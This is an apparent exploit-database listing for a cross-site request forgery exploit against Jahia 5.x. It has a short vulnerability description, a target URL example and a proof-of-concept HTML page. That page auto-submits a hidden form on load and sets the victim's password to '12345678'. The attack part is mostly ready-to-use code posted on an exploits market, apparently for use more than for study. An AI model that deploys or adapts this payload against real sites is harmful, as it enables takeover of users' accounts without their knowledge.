[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Jahia 5.x CSRF Exploit

Author
Liz Vicious
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19927
Category
web applications
Date add
09-12-2012
Platform
jsp
------------------------------------------------------------------
-- [ Info ] ------------------------------------------------------
------------------------------------------------------------------

Jahia 5.x CSRF Exploit
Jahia is vulnerable to cross-site request forgery because of not validating form data.
Tested on: 5.0.5
Disclosure date: 2012-12-09

------------------------------------------------------------------
-- [ Description ] -----------------------------------------------
------------------------------------------------------------------

Change __TARGET__ with your target url

Example: http://localhost:8080/jahia/Jahia/engineName/mysettings/op/edit/pid/1?mode=display&screen=save

------------------------------------------------------------------
-- [ PoC ] -------------------------------------------------------
------------------------------------------------------------------

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Password</H2>
<form method="POST" name="form0" action="__TARGET__">
<input type="hidden" name="mysettings-user-password" value="12345678"/>
<input type="hidden" name="mysettings-user-passwordConfirmation" value="12345678"/>
</form>
</html> 

------------------------------------------------------------------
-- [ Screenshots ] -----------------------------------------------
------------------------------------------------------------------

http://i.imagebanana.com/img/2yjijj6z/_007.png
http://i.imagebanana.com/img/7sqdtcpv/_006.jpg

------------------------------------------------------------------
-- [ Author ] ----------------------------------------------------
------------------------------------------------------------------

Author: Liz Vicious
Greetz: mx, stranger, helats, double trouble, BlackCoin family

#  0day.today [2024-11-16]  #